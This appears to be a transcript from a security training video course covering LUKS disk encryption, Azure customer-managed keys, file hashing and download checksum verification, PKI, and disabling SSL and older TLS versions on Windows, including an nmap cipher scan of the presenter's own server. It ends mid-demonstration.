Now, the next thing we have to do is make a file system on it, because right now it can't even be mounted and files can't be placed on that disk location. So I'm going to run standard Linux commands to do that: mkfs, so make filesystem, .ext4. And I've got to specify /dev/mapper now, because I've given this volume the name archive1. Let's just go ahead and do that. Okay, that was pretty quick and easy. It is a small disk volume, mind you.
[Video description begins] He executes the following command: mkfs.ext4 /dev/mapper/archive1. The output
displays the creation of a filesystem. [Video description ends]
Let's make a mount point directory on the root here. Why don't we call it the same thing, archive1? It doesn't have to be called the same thing; it's just a common Linux convention, but I will do that.
[Video description begins] He executes the following command: mkdir /archive1. No output returns and the
prompt does not change. [Video description ends]
And the next thing we want to do is mount that so it's usable. So when I say mount that, I'm talking about mounting our encrypted volume, /dev/mapper/archive1. And we happen to have a folder, a mount point folder, on the root with the same name. It doesn't have to be the same thing, but that's what I've called it here.
[Video description begins] He executes the following command: mount /dev/mapper/archive1 /archive1. No
output returns and the prompt does not change. [Video description ends]
[Video description begins] He executes the following command: mount. The output displays information about
the mounted filesystem in the directory structure. [Video description ends]
If I type mount, then we can see here that it is available under /archive1.
[Video description begins] In the output, he points to the text "/dev/mapper/archive1 on /archive1 type ext4
(rw,relatime)". [Video description ends]
So what that means is, if we change directory to /archive1, we can just work with the file system here as we normally would.
[Video description begins] He executes the following command: clear. No output returns and the screen
clears. [Video description ends]
And place files here, remove files, rename files, organize them in folders, anything we would normally do.
[Video description begins] He executes the following command: cd /archive1. No output returns and the
prompt changes to "root@kali:/archive1#". He then executes the following command: ls -l. The output
displays that there are 16 files and subdirectories in the current directory. [Video description ends]
So it is working. And as per any file system in a Linux environment, you can also unmount it with the umount
command, umount let's say /archive1.
[Video description begins] He executes the following command: umount /archive1. The output reads "umount:
/archive1: target is busy". The prompt does not change. [Video description ends]
Now of course it says it's busy because I'm in there. That's my mistake. Let's get out of here by cd back to the
root.
[Video description begins] He executes the following command: cd /. No output returns and the prompt
changes to "root@kali:/#". [Video description ends]
[Video description begins] He executes the following command: umount /archive1. [Video description ends]
[Video description begins] He executes the following command: mount. The output displays information about
the filesystem in the directory structure. [Video description ends]
And if we type mount, well, we don't see that mount point listed down at the bottom any longer.
[Video description begins] He executes the following command: clear. No output returns and the screen
clears. [Video description ends]
Now I can also run cryptsetup to close up that encrypted volume so it's not in use: luksClose, and I tell it archive1.
[Video description begins] He executes the following command: cryptsetup luksClose archive1. No output
returns and the prompt does not change. [Video description ends]
I can also open it again, of course, with cryptsetup. Essentially, opening it up means I want to be able to see what's there; I want access to that data, and I don't want it to be locked up and encrypted anymore. So I can run cryptsetup luksOpen, in this case against /dev/sdb, and then archive1.
[Video description begins] He executes the following command: cryptsetup luksOpen /dev/sdb archive1. The
window prompts "Enter passphrase for /dev/sdb:". [Video description ends]
Of course, it wants the passphrase. Now, I don't need one to close up and basically lock up that encrypted disk volume, but to open it, I do need the passphrase. I'm going to go ahead and put that in, and we are good to go.
[Video description begins] The prompt "root@kali:/#" is displayed. [Video description ends]
So we're looking here at how to manually work with an encrypted disk volume in Linux. To set up persistent mounts that would automatically make that LUKS-encrypted volume available upon reboot, you could make changes to the /etc/crypttab file.
[Video description begins] He executes the following command: ls /etc/crypttab. The output reads
"/etc/crypttab". The prompt does not change. [Video description ends]
So by doing that, you can have it mount automatically. Now, bear in mind that what we're talking about here is encryption that will protect the data at rest when the machine is off. When the machine is on, it's as if LUKS encryption isn't even there. So standard hardening techniques and best practices should always be adhered to while the machine is functional. And of course, don't lose the passphrase. Otherwise, all your encrypted data is irretrievable when you need to remount that encrypted LUKS container again.
Find out how to configure custom encryption keys for cloud storage.
Objectives
[Video description begins] Topic title: Cloud Storage Encryption. The presenter is Dan Lachance. [Video
description ends]
Protection of data at rest, in other words, encrypting data, also applies in the cloud. Most public cloud
providers will give cloud tenants, or customers, the option of using managed keys that are created by the
provider to encrypt cloud storage, or, to use customer controlled keys, which is what we're going to do. So,
here, we're going to do this on the Microsoft Azure public cloud computing platform.
[Video description begins] A web page called "All resources - Microsoft Azure" is open. [Video description
ends]
To get started, I need to create a resource. So I'm going to click in the upper left, here, on the Azure portal web
page.
[Video description begins] He opens the portal menu, which includes several menu options. [Video description
ends]
I've already got an Azure account. I've already signed into this management tool. I'm going to click Create a
resource. The first thing I need to create is a Key Vault.
[Video description begins] A blade labeled "New" opens. It includes a search bar. [Video description ends]
[Video description begins] He types the text, "key vault" in the search bar and selects the search option
labeled "Key Vault". The corresponding blade opens. [Video description ends]
I'm going to be creating a key that will be used to encrypt cloud-stored data. So I'm going to Create the Key
Vault. There are a few things I'll have to fill in, nothing too major.
[Video description begins] He clicks a button labeled "Create" and its corresponding blade opens. A tab
labeled “Basics” is selected in the blade. [Video description ends]
So you don't need to be an expert in Azure for this to happen. So a Resource group is simply a way to organize
related cloud resources so they can be managed or deployed as a group.
[Video description begins] He clicks a drop-down list box labeled "Resource group", and a drop-down list
opens, which includes an option labeled "RG1". He then selects the option. [Video description ends]
So I already have a Resource group called RG1. I'm going to tie this Key Vault to that Resource group. I'm
going to call the Key Vault something that is in line with the naming rules within my organization.
[Video description begins] He enters the text, "kv45560yhz" in a text box labeled "Key vault name". [Video
description ends]
I'm going to specify a physical location, or region, here. Let's see, well, we have all kinds of options.
[Video description begins] He clicks a drop-down list box labeled “Region”, and a list opens. [Video
description ends]
Why don't we put this in East US? Now, I can specify retention period values and so on. However, at this point, I'm okay with this. I'm just going to click the Review + create button. The validation passed, so I've filled in what I needed to fill in. I'm going to go ahead and click Create to create the Key Vault.
[Video description begins] A page called “Overview” opens in a blade called “kv45560yhz”. It includes the
text, "Your deployment is underway". [Video description ends]
Now, we're creating this Key Vault in the cloud, after which I'm going to navigate to it and create a key within
the vault.
[Video description begins] The text changes to "Your deployment is complete". [Video description ends]
Once the Key Vault deployment is complete, I'll click the link or the button that says, Go to resource.
[Video description begins] The kv45560yhz blade opens. [Video description ends]
And within there, I'll click Keys, on the left, and I want to generate a key.
[Video description begins] The Keys page opens in the blade. He clicks a button labeled "Generate/Import"
and its corresponding blade opens. [Video description ends]
Notice I could also choose to import a key or restore from backup if I already had one.
[Video description begins] He clicks a drop-down list box labeled "Options" and a drop-down list opens,
which includes an option labeled "Generate". He then selects the Generate option. [Video description ends]
I'm going to call this Key1. It's going to be an RSA 2048-bit key. I'm not going to set an activation or
expiration date, so it could be used now and it's Enabled, and I'll click Create.
[Video description begins] The blade closes. A key called “Key1” appears in the Keys page with the status
“Enabled”. [Video description ends]
So that takes care of the key in the Key Vault. The next thing I'm going to do is click in the upper left here and create another resource; I'm going to search for a storage account.
[Video description begins] He opens the portal menu and selects an option labeled "Create a resource". The
New blade opens. [Video description ends]
And I'm going to basically create a new Storage account here in the Microsoft Azure cloud.
[Video description begins] He selects the search option labeled "Storage account - blob, file, table, queue"
and its corresponding blade opens, which includes a button labeled "Create". He then clicks the Create button
and its corresponding blade opens. In the blade, the Basics tab is open. [Video description ends]
So put it in the Resource group RG1. I'll call it sa, for storage account. And again, I'll follow the nomenclature
rules for my organization.
[Video description begins] He enters the text, "sa44563yhz" in the Storage account name text box. [Video
description ends]
It's going to be in East US, and really, I'm not going to change any other details about the account. I will click Review + create, and then I'll Create the storage account. What I want to do, once that's successfully deployed, is go into the properties of the storage account and take a look at the encryption.
[Video description begins] The Overview page of the Microsoft storage account opens. [Video description
ends]
Now what should happen is it should automatically be encrypted using Microsoft Azure-managed keys. Well,
for regulatory compliance, in some cases, or even just security standards compliance outside of laws and
regulations, your organization might need to control the keys that encrypt cloud-stored data. And so it's a good
option to have.
[Video description begins] A blade labeled "sa44563yhz" opens. [Video description ends]
All right, let's click Go to resource, to go to the storage account, and I'm going to click on Encryption on the
left.
[Video description begins] A page called "Encryption" opens. [Video description ends]
And again, it's currently set by default to Microsoft Managed Keys, and that's what we want to change.
[Video description begins] He selects a radio button labeled "Select from Key Vault" and a link labeled
"Select a KeyVault and Key for encryption" appears. [Video description ends]
So I'm going to click Customer Managed Keys, and I'm going to scroll down, going to select from a vault, so
I'll select a Key Vault.
[Video description begins] He clicks the link and its corresponding blade opens. [Video description ends]
And that Key Vault will be the one that we just created a few moments ago here.
[Video description begins] In the blade, he clicks a drop-down list box labeled "Key vault" and a drop-down
list opens, which includes an option labeled "kv45560yhz". He then selects the option. [Video description ends]
And I'll select a key, Key1, and the version of the key.
[Video description begins] He clicks a drop-down list box labeled "Key" and a drop-down list opens, which
contains an option labeled "Key1". He then selects the option. [Video description ends]
We've only got one single current version of the key, and I'll choose Select.
So now it's filled in the Key Vault name and the key that will be used to encrypt this data in this storage
account. Of course, there's no data yet because it's just been created, but I'm going to go ahead and click Save,
to put that into effect. Now, it says that new data will be encrypted, any old data will be retroactively encrypted
using a background process. So you don't have to worry about data that might already have been there. So in
this way, we have a key that is under our control as a cloud tenant to manage protection of data at rest in the
Microsoft Azure cloud.
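If you prefer scripting over the portal, the Azure CLI can do roughly the same thing. This is only a sketch: it assumes the az CLI is installed and that the storage account's identity has been granted get, wrapKey, and unwrapKey permissions on the vault key (for example with az keyvault set-policy), and the parameter names should be confirmed against az --help for your CLI version. The resource names match the demo.

# Create the key vault and an RSA 2048-bit key in it
az keyvault create --name kv45560yhz --resource-group RG1 --location eastus
az keyvault key create --vault-name kv45560yhz --name Key1 --kty RSA --size 2048

# Create the storage account with a system-assigned identity
az storage account create --name sa44563yhz --resource-group RG1 --location eastus --assign-identity

# Point the storage account encryption at the customer-managed key
az storage account update --name sa44563yhz --resource-group RG1 \
  --encryption-key-source Microsoft.Keyvault \
  --encryption-key-vault https://kv45560yhz.vault.azure.net \
  --encryption-key-name Key1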
Upon completion of this video, you will be able to recognize the importance of hashing for file systems and network communications.
[Video description begins] Topic title: Hashing. The presenter is Dan Lachance. [Video description ends]
Hashing is a function of cryptography, it can be used for file integrity, where we can detect unauthorized
tampering of files. Hashing generates a unique value that represents the state of that file at that point in time. If
anything in that file changes when we run a hash of the file again, that unique value will be different. And so
we know because it's different, the file itself is different. So that's how it can be used to detect unauthorized
tampering. So you'll see hashing at the file system level often used with Digital Forensic Analysis to ensure
that collected evidence of a digital nature on storage media is admissible in a court of law. Because we want to
make sure that nothing has been tampered with by third parties or by law enforcement and so on, since the
evidence was gathered. Often, these days, hashing uses SHA-256 as the hashing algorithm, 256 bits, where SHA stands for secure hashing algorithm. That's as opposed to using the older and much less secure MD5 hashing algorithm, message digest version 5.
So the hashing process begins with feeding raw data bits into a one way hashing algorithm. Now the result of
that is the hash or what is also sometimes called a message digest. The terms are synonymous. Now the future
hashes of that same data will be different if the source data has been modified, as we discussed with hashing.
Digital signatures take it a step further, such as when you digitally sign an email message. They use hashing: the message content is run through a hash algorithm that results in a hash value or message digest. That is a unique item representing the contents of the message, and that's the integrity part of this. The hash value is then encrypted with the sender's private key. So we're talking about a user, in this case, having a public and private key pair. They have the private key in their possession, and it can be used to essentially create a digital signature that gets verified, by others that receive the message, with the related public key. This is all about message authenticity at this point. So with the public key on the other end, the recipient can essentially go through the same type of calculation, verify the hash, and confirm that the message came from who it says it came from.
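To make that concrete, here's a small OpenSSL sketch of signing and verifying; the key and file names are hypothetical, and a mail client hides these steps behind a button, but the underlying operations are the same:

# Sender: hash the message with SHA-256 and encrypt the hash with the private key, producing the signature
openssl dgst -sha256 -sign private.pem -out message.sig message.txt

# Recipient: recompute the hash and verify the signature using the sender's public key
openssl dgst -sha256 -verify public.pem -signature message.sig message.txt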
[Video description begins] Topic title: Windows File Hash Generation. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I'm going to use PowerShell to generate file hashes. File hashes, of course, are used to
verify whether or not a change has occurred in a file by comparing a current hash to a past hash. If the hash
values are the same, the file hasn't changed.
[Video description begins] A window called "Administrator: Windows PowerShell" opens. The prompt "PS C:\
Users\Administrators>" is displayed. [Video description ends]
But if they're different, a change has occurred. I'm going to go to drive D where I know I've got a Budgets folder.
[Video description begins] He executes the following command: d:. No output returns and the prompt changes to "PS D:\>". [Video description ends]
[Video description begins] He executes the following command: cd .\Budgets\. No output returns and the prompt changes to "PS D:\Budgets>". [Video description ends]
Here in my Windows Server 2019 environment, I'm going to fire up PowerShell. And I know I've got a couple
of files here.
[Video description begins] He executes the following command: cls. No output returns and the screen clears.
The prompt does not change. He then executes the following command: dir. The output displays all the files
contained in the Budgets folder. [Video description ends]
Now, the first thing I'm going to do here is generate a file hash, unique hash, for each of these files. So I can do
that with get-filehash. I could specify a specific file name, but here, I'll put *.*, every file with every extension
in the current directory. When I do that, I can see the unique hash values, they're SHA256 by default.
[Video description begins] He executes the following command: get-filehash *.*. The output displays hash
values and algorithms for all the files contained in the Budgets folder. [Video description ends]
And I can see that they are tied, of course, to the individual file names.
[Video description begins] In the output, he highlights the hash value for a file "Budget1.txt" and then points
to its corresponding algorithm, which is SHA256. [Video description ends]
Now we're going to make a change, let's say to the file Budget1.txt.
[Video description begins] In the output, he highlights the hash value for a file "Budget2.txt". [Video
description ends]
Now we can see it's got a specific hash value, and we'll just keep that on screen.
[Video description begins] In the output, he highlights "Budget1.txt" and then highlights its corresponding
hash value. [Video description ends]
Now, if you're really going to be using this, you'll probably want to redirect the output of the get-filehash command to a file somewhere so that you have a record of it, maybe using the output redirection symbol, the greater-than sign. At any rate, what I'm going to do here is use Notepad to open up the Budget1.txt file, and I'm going to make a change.
[Video description begins] He executes the following command: notepad .\Budget1.txt. No output returns and
the prompt does not change. A file called "Budget1 - Notepad" opens, which includes the text "Sample
Data". [Video description ends]
Change, there you go. And I'm going to close and save the file, of course.
[Video description begins] In the file, he enters the text "Change" and clicks a button labeled "Close". A pop-
up opens, which includes a button labeled "Save". He clicks the button and the file closes. [Video description
ends]
So now what I want to do is I actually want to run get-filehash but only against, let's say that single file, and I
only want to check the hash on Budget1. So I'm going to go ahead and do that.
[Video description begins] He executes the following command: get-filehash .\Budget1.txt. The output displays
the hash value and algorithm for the Budget1.txt file. [Video description ends]
Now, immediately, we can see the previous hash of Budget1 listed above is not the same as the current hash listed down below.
[Video description begins] In the output of the command "get-filehash *.*", he highlights the hash value for the Budget1.txt file and then, in the output of the command "get-filehash .\Budget1.txt", he highlights the hash value for the Budget1.txt file. [Video description ends]
And of course, that's because we changed the contents of the file. We know that a change has occurred. Now to
track details about changes, where the change was made from, who did it, and so on, we should enable file
system auditing. But at this level, get-filehash in PowerShell will at least alert us to the fact that a change has
occurred.
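Building on that earlier suggestion to keep a record of the hashes, here's a minimal PowerShell sketch for saving a baseline and spotting changed files later; the baseline file path is just an example:

# Save a baseline of hashes for every file in the current folder
Get-FileHash *.* | Export-Csv D:\baseline.csv -NoTypeInformation

# Later, flag any file whose current hash no longer matches the baseline
$baseline = Import-Csv D:\baseline.csv
Get-FileHash *.* | Where-Object {
    $current = $_
    ($baseline | Where-Object { $_.Path -eq $current.Path }).Hash -ne $current.Hash
}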
[Video description begins] Topic title: Linux File Hash Generation. The presenter is Dan Lachance. [Video
description ends]
Hashing is a cryptographic function that essentially takes data, feeds it through a one way algorithm. You don't
need a key, it's not encryption. And that results in a unique hash, otherwise called a message digest. Now why
do we need this? We need this because it allows us to identify changes in the future when we run that hashing
algorithm again. And this is a big deal when it comes to digital forensics and the admissibility of evidence to
ensure it's not been tampered with. So there are many ways to do that.
[Video description begins] A window called "dlachance@kali: ~" opens. The prompt "root@kali:/#" is
displayed. [Video description ends]
Here in Linux, I'm going to do it with SHA-256, where SHA stands for Secure Hashing Algorithm. So to get started here, let's go ahead and create a file. I'm going to call this testfile.txt.
[Video description begins] He executes the following command: touch testfile.txt. No output returns and the
prompt does not change. [Video description ends]
And what I want to do is immediately generate a hash of that file, even though there's nothing in it. The touch
command simply creates a zero-byte file. So to do this, I'm going to run sha256sum, that's a built-in Linux command, and I'm going to run it against testfile.txt.
[Video description begins] He executes the following command: sha256sum testfile.txt. The output displays the
hash value for a file called "testfile.txt". The prompt does not change. [Video description ends]
Now here we see on the screen, the unique hash value. Now of course, you could write that out to a file, which
I'm going to do, I'm going to use the up arrow key to bring up that previous command. And I'm going to use
the append output redirection symbol, two greater than signs. And let's say we're going to create a file here
called hashes.txt.
[Video description begins] He executes the following command: sha256sum testfile.txt >> hashes.txt. No
output returns and the prompt does not change. [Video description ends]
Now once that's done, I can use the cat command to view the contents of hashes.txt, now it's stored in a file.
[Video description begins] He executes the following command: cat hashes.txt. The output displays the
contents of a file called "hashes.txt". The prompt does not change. [Video description ends]
We're not reliant on what's on the screen. So what I'm going to do now is make a change to testfile.txt. I'm
going to echo "Hello world" to the file. So I'll use the echo command, put my text in quotes, single greater than
sign output redirection and I want that going into testfile.txt. We're going to cat testfile.txt.
[Video description begins] He executes the following command: echo "Hello world" > testfile.txt. No output
returns and the prompt does not change. [Video description ends]
[Video description begins] He executes the following command: cat testfile.txt. The output reads "Hello
world". The prompt does not change. [Video description ends]
So let's use the up arrow key, and let's go back to our sha256sum command, where we are generating a hash for testfile.txt, and we're going to append the result to hashes.txt.
[Video description begins] He executes the following command: sha256sum testfile.txt >> hashes.txt. No
output returns and the prompt does not change. [Video description ends]
[Video description begins] He executes the following command: cat hashes.txt. The output displays the
contents of a file called "hashes.txt". The prompt does not change. [Video description ends]
Same file, different hashes, because the file has changed. And therein lies the purpose of generating hashes of file system objects.
In this video, you will download and verify the checksum for Kali Linux.
Objectives
[Video description begins] Topic title: Internet Download Hash Comparison. The presenter is Dan
Lachance. [Video description ends]
Hashing is used in cryptography to detect changes, whether it's a network message that might have changed between when it was sent and when it was received over the network, or a file that might have been downloaded over the Internet. So hashing isn't used only for security purposes like digital forensics and evidence admissibility.
[Video description begins] A web page called "Official Kali Linux Downloads" is open. [Video description
ends]
In this example, I've gone to the Kali Linux Download page, where I have a number of download images that
can be brought down over the Internet to a user's machine.
[Video description begins] He scrolls through the page. The page includes a table. [Video description ends]
[Video description begins] He points to a row entry labeled "Kali Linux 64-Bit (Live)" under a column header
labeled "Image Name". [Video description ends]
[Video description begins] He points to a column header labeled "SHA256Sum". [Video description ends]
SHA, S-H-A, stands for Secure Hash Algorithm. The purpose of posting this value on the website is so that people who download the image can run the same hashing algorithm against the downloaded file and make sure the resulting value is the same.
[Video description begins] He highlights a row entry under the SHA256Sum column header, adjacent to the
Kali Linux 64-Bit (Live) row entry. [Video description ends]
And if it's the same, it means it hasn't been corrupted. So let's go ahead and do this. So we're going to focus on
the Kali Linux 64-Bit (Live) file that I've downloaded, we're going to make sure that the SHA256Sum, well, is
the same as this.
[Video description begins] He points to the row entry under the SHA256Sum column header, adjacent to the
Kali Linux 64-Bit (Live) row entry. [Video description ends]
[Video description begins] He opens a window called "Windows PowerShell". The prompt "PS D:\>" is
displayed with the following command: get-filehash .\kali-linux-2020.1-live-amd64.iso. [Video description
ends]
So to generate a hash locally on my Windows computer, I can go into PowerShell and call upon the get-
filehash cmdlet. On the root of drive D is where I've downloaded that file. So, I'm going to go ahead and press
enter, but just bear in mind that the larger the file, the longer it'll take to generate the hash. The default
algorithm used here for hashing with get-filehash unless specified otherwise in the command line is SHA256.
[Video description begins] In the output, he highlights the hash value. [Video description ends]
The hash starts with ACF455. And sure enough ends with 79152.
[Video description begins] He switches to the Official Kali Linux Downloads web page and points to the row
entry under the SHA256Sum column header, adjacent to the Kali Linux 64-Bit (Live) row entry. [Video
description ends]
So back here on the Kali site, we can see indeed that the SHA256 hash value is the same. So we know that
what we've downloaded hasn't been changed in any way, such as through corruption, while downloading that
file.
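As a rough sketch of that comparison in PowerShell, not part of the demo: the published value below is a placeholder, and in practice you would copy the full SHA256Sum string from the download page.

# Published value is a placeholder; paste the real SHA256Sum from the download page
$published = 'ACF455...79152'
$actual = (Get-FileHash 'D:\kali-linux-2020.1-live-amd64.iso' -Algorithm SHA256).Hash
if ($actual -eq $published) {
    'Download verified: hashes match'
} else {
    'Hash mismatch: the download may be corrupted or tampered with'
}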
In this video, you will identify the steps in the PKI certificate lifecycle.
Objectives
[Video description begins] Topic title: Certificate Lifecycle. The presenter is Dan Lachance. [Video
description ends]
Public Key Infrastructure, or PKI, is a system, or more specifically, a hierarchy of digital security certificates.
And these are used to secure technology in some way. So, for example, if the need is for email confidentiality,
then the solution that PKI would offer would be to encrypt the message with the recipient's public key. If we
need email authenticity and integrity, the solution would be to generate a message hash of the message and
encrypt that hash with the sender's private key. It would get verified on the recipient's end with the related public key. If the need is to secure network communication to a web server, the solution could be to use a PKI
certificate, along with the TLS version 1.2 or higher protocol, to enable HTTPS for that web server site. If we
need multifactor authentication to a VPN, maybe the solution includes having smart cards issued to users with
embedded private keys. If the need is a single card for facility and computer access, maybe the solution would
be to issue common access cards with embedded private keys. So that single card could be used to gain access
to a facility, and the same card can also be used to access computer systems. Now, a lot of this would be
automated and transparent to the user, such as encrypting and digitally signing messages. The user, at the most,
might have to click a button to do these things, that's about it.
[Video description begins] PKI Lifecycle. [Video description ends]
Now, PKI certificates have a lifecycle. They are issued from a certificate authority, and the certificate authority or template configuration determines how long the certificate is good for. The certificate template also determines how the certificate can be used. Can it only be used to send digitally signed email messages? Can it be used for mail encryption? Maybe only for encryption of file system items? Next, before the certificate expires, it can be renewed. An expired certificate is no longer valid, and therefore can no longer be used. But if you want to maintain the same usage of the certificate over time, it can be renewed, much like you would renew a passport or a driver's licence as opposed to letting it expire and going through the entire process again. Certificates can also be revoked; that's another possible item in the lifecycle. Revocation is done at the CA level, where the serial number of the certificate, depending on the specific protocol being used, is added to a list. And that list is checked when services are being used to determine whether or not someone is trying to connect with a revoked PKI certificate.
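As a small illustration of the renewal side of that lifecycle, here's a hedged PowerShell sketch that lists local computer certificates expiring soon; the certificate store path and the 30-day window are just example choices.

# List local computer certificates that expire within the next 30 days (window is an example)
Get-ChildItem -Path Cert:\LocalMachine\My |
    Where-Object { $_.NotAfter -lt (Get-Date).AddDays(30) } |
    Select-Object Subject, NotAfter, Thumbprint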
After completing this video, you will be able to recognize how SSL and TLS are used to secure network
traffic.
Objectives
recognize how SSL and TLS are used to secure network traffic
[Video description begins] Topic title: SSL and TLS. The presenter is Dan Lachance. [Video description ends]
SSL and TLS are network security protocols. SSL stands for Secure Sockets Layer. This was a Netscape
protocol in the 1990s to secure connectivity to applications like websites. TLS is the Transport Layer Security
network protocol, and it supersedes SSL. Now both SSL and TLS require PKI certificates. So let's say you
want a secure connectivity to a web application. So instead of HTTP, you want HTTPS connections, normally
over port 443. You need a PKI certificate to do that. To call it an SSL certificate is technically not correct
because it's a PKI certificate. And that same certificate could be used for either SSL or TLS depending on
what's enabled for network security protocols on client web browsers and on server HTTP stacks. So you
configure SSL and TLS for a specific app. For example, if you want to configure four different web servers,
then that's four different PKI certificates. Of course, you can use wildcard certificates. But generally speaking,
it's a separate configuration for each app. Now, HTTPS uses a different port number than plain HTTP. The default port number for HTTPS, whether secured with SSL or TLS, is 443. It can be any port number you want, but these days that would be the norm. That's an HTTPS connection, where an HTTP connection normally uses port 80. So what does it provide?
Well, SSL and TLS provide confidentiality in the form of encryption over the network, and also integrity and authentication. The software being used will determine whether authentication checks, or checks for tampering with transmissions, are actually being done. So with SSL and TLS, there are some things to bear in mind. SSL has been available since the 90s, so as you might imagine, it's quite old, although there have been multiple versions up to SSL 3. It is superseded by TLS, Transport Layer Security, and so SSL should not be used at all, not even version 3. TLS has been around since the late 1990s. Now
you should be using only TLS version 1.2 or higher where possible. Of course, depending on the client web
browsers connecting to your web server stack, it might dictate that you still support TLS 1.0 and so on. But
you do that with the understanding that you are leaving some vulnerabilities on that host if you're using that
protocol.
Now as of March 2020, major web browsers are going to start displaying deprecation warnings if a site that a
user is connecting to is not using TLS version 1.2 or higher. This is probably not something that most
organizations want their users to experience, because it erodes trust and that's the last thing that we need. So it
makes sense then, to make sure that we don't use older, insecure protocols that formerly were used ironically to
secure network connections.
Now the port numbers used with SSL and TLS are different from the standard unencrypted port numbers. For example, HTTPS uses port 443. LDAPS, if you're securing LDAP connectivity, uses port 636 by default. SMTPS for mail transfer uses ports 465 and 587, POP3S for mail retrieval uses port 995, and IMAPS uses port 993.
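For reference, here's a minimal PowerShell sketch, not from the demo, that checks which protocol version a given HTTPS server actually negotiates; the host name is an example, and the result also depends on which protocols the client operating system itself has enabled.

# Check which SSL/TLS protocol version a server negotiates (host name is an example)
$hostName = 'www.example.com'
$client = New-Object System.Net.Sockets.TcpClient($hostName, 443)
$ssl = New-Object System.Net.Security.SslStream($client.GetStream())
$ssl.AuthenticateAsClient($hostName)
$ssl.SslProtocol          # e.g. Tls12
$ssl.Close()
$client.Close()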
In this video, find out how to disable SSL on web clients and servers.
Objectives
[Video description begins] Topic title: Disabling SSL. The presenter is Dan Lachance. [Video description
ends]
Secure Sockets Layer or SSL is now deprecated. It should not be used because there are known vulnerabilities, and there are freely available tools out there in the wild that can exploit them. The irony is that SSL is designed to protect communications over a network. SSL is a network security protocol that uses a PKI certificate to secure, for example, a web application, but it shouldn't be used. And so as a result,
we can choose to disable it, client and server side. Let's start by disabling SSL on the client side. So here on
my Windows host, I'm going to fire up a web browser, doesn't matter which one specifically.
[Video description begins] He opens the Internet Explorer browser. [Video description ends]
And there are different ways that you would arrive at this location. But here in Internet Explorer, I'll press
Alt+T to open up the Tools menu.
[Video description begins] A dialog box called "Internet Options" opens. [Video description ends]
I'm going to go down to Internet Options and I'm going to go to Advanced because at the very bottom under
the Security section, there are plenty of security options. But one of the things we want to watch out for is to
turn off SSL 3.0.
[Video description begins] In a section labeled "Security", he deselects a checkbox labeled "Use SSL
3.0". [Video description ends]
[Video description begins] He deselects checkboxes labeled "Use TLS 1.0" and "Use TLS 1.1". [Video
description ends]
We really should be using TLS, Transport Layer Security, the successor of SSL. We should be using 1.2 or
higher.
[Video description begins] He points to a checkbox labeled "Use TLS 1.2", which is preselected. [Video
description ends]
So I'm going to turn off SSL and everything below TLS version 1.2 and this is on the browser or client side.
Now on a larger scale, of course, you're not going to do this individually one by one. And of course, it might
be done differently on a Linux host versus an iPhone or an Android device. But one way or another, we want
to make sure that we turn this off because really, we don't want to allow connectivity to those sites that would
be vulnerable. So I'll click OK. However, that is only on the client side. If this same server is also a web server,
we can also disable the use of SSL on the server side for the web server stack, assuming it's a web app that is
using SSL. SSL can be used for other things as well like SMTP mail transfer, POP3 client mail retrieval, and
so on.
[Video description begins] He opens the Registry Editor window. It is divided into two parts. The first part is a
navigation pane. The second part is a content pane. [Video description ends]
You're going to need access to the Registry Editor. You can launch that from your Start menu like I've done
where you can go down under Computer, HKEY_LOCAL_MACHINE, SYSTEM, CurrentControlSet,
Control. If you go all the way down under SecurityProviders and SCHANNEL, you'll see something called
Protocols.
[Video description begins] From the navigation pane, he selects a folder labeled "Protocols" and it opens in
the content pane. [Video description ends]
Now what we want to do to make sure SSL3 is disabled is create a couple of keys and items here. So I'm going
to right click on Protocols. I'm going to choose New, Key and I'm going to call it SSL 3.0.
[Video description begins] A sub folder labeled "SSL 3.0" is added under the Protocols folder. [Video
description ends]
Now, what I want to do is create a new key within it. And I'm going to call it Server so I'm going to right click
on SSL 3, New, Key, and it's called Server.
[Video description begins] A sub folder labeled "Server" is added under the SSL 3.0 sub folder. [Video
description ends]
Now I'm going to create a new DWORD 32-bit value under there called disabled by default.
[Video description begins] A file labeled "New Value #1" appears in the content pane. The file has a value of
0. [Video description ends]
So I'll right-click on Server and make a new DWORD 32-bit value, and change the name here to DisabledByDefault.
[Video description begins] He renames the New Value #1 file to "DisabledByDefault". [Video description
ends]
Now, we can see that it has a value of 0. And of course, we want to make sure that we change that item. And
you just make sure that you set that to a value of 1.
[Video description begins] He double-clicks the DisabledByDefault file and its corresponding dialog box
opens. He then points to a text box labeled "Value data" with the text "1". He then clicks a button labeled
"Cancel" and the value of the DisabledByDefault file changes from '0' to '1'. [Video description ends]
Now, in that same location, you can also make another DWORD value called Enabled and make sure it's set to
0.
[Video description begins] He right-clicks the Server sub folder. A menu opens, which includes an option
labeled "New". He selects the New option and a flyout opens. It includes an option labeled "DWORD (32-bit)
Value. He selects the option and a file labeled "New Value #1" appears in the content pane. He then renames
the file to "Enabled". [Video description ends]
[Video description begins] He double-clicks the Enabled file and its corresponding dialog box opens. It
includes a text box labeled "Value" with the text "0". He then clicks a button labeled "OK" and the dialog box
closes. [Video description ends]
But because this is Server 2019, SSL is not going to be enabled anyhow, but TLS will be. Let's take a look at
that fact.
[Video description begins] He opens a window called "dlachance@kali: ~". The prompt "dlachance@kali:~$"
is displayed with the following command: nmap -sV --script ssl-enum-ciphers -p 443 3.83.64.193. [Video
description ends]
Here in Kali Linux, I'm going to use the nmap built-in tool. And I'm essentially going to call upon a script
called ssl-enum-ciphers. So what it's designed to do is to scan to see which SSL ciphers are enabled on a given
host. Now -p for port 443 because I do have a web app configured with a certificate. And here is the IP address
of my public facing web application service.
[Video description begins] In the command, he highlights 3.83.64.193. [Video description ends]
I'm going to go ahead and press Enter. And let's give it a moment to go through and enumerate through the
supported ciphers. Now even though the script has SSL in the name, it's also going to show us any TLS ciphers
that are enabled on our web application.
[Video description begins] He executes the following command: nmap -sV --script ssl-enum-ciphers -p 443
3.83.64.193. The output displays that Nmap is done and one IP address is scanned in 17.47 seconds. [Video
description ends]
So we can now see that we've got some resultant output. Let's scroll back up and check it out. Well, I don't see any references here to SSL 3. However, I do see TLS version 1.0 and TLS version 1.1. They shouldn't be used; there are known vulnerabilities. And then there's TLS version 1.2. Well, that's good. That one doesn't have any vulnerabilities, at least not yet. Basically, what we want to do is take this a few steps further, because on the server we're going to turn off TLS version 1.0 and TLS version 1.1. Then we're going to come back and do this scan
again to see what the result is. So if I were to go ahead and add keys for TLS 1.0 and TLS 1.1, and under each
of them create a subkey called Server.
[Video description begins] He executes the following command: clear. No output returns and the screen
clears. He then switches to the Registry Editor window. [Video description ends]
